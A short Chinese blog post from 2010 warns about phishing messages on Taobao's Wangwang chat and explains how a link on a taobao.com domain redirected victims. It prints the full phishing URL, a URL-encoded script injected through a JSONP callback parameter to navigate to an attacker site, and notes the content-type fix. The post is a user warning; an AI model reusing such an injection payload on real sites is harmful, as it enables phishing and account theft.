经常在旺旺看到很多类如下信息:
亲,你的东西还卖吗?这个违规下架了你不处理?我要买啊
http://tbskip.taobao.com/json/spu_price_trend.htm?callback=%3cscript%3ewindow.navigate%28%27//%74%2E%6Dhttp%2E%63o.cc/c.taobao.com/?%2F5941486%2F%27%29%3c%2fscript%3E
以前总是搞不懂为什么看链接是taobao.com的域名,点了后会有问题,那些骗子怎样弄可以弄到含有taobao.com字符拉链,也没有看后url=这样的字符窜啊,经询问呢,得到结果如下:
是通过淘宝的已不请求json构造个callback,注入window.navigate(‘//t.mhttp.co.cc/c.taobao.com
/5941486/’)脚本
试图将用户引导到目标站定上
用户看连接以为是淘宝的,很安全就点了
如果把http头的 content-type部分改为text/javascript就没这种漏洞了
以上由貘大师说明,我承认我自己没检测过,这玩意对于我来说还有点高深,原谅我吧 – -
总之呢,这链接接点点是没事,但千万别登陆就行,不然账号和密码被盗取就是自己的问题了
PS:貌似现在淘宝已经给过滤掉了, 不直接跳转了,不知道还有没有其他的 10.08.20记
相关博文
One Response to “无孔不入的钓鱼网站”
Leave a Reply
道高一尺魔高一丈啊。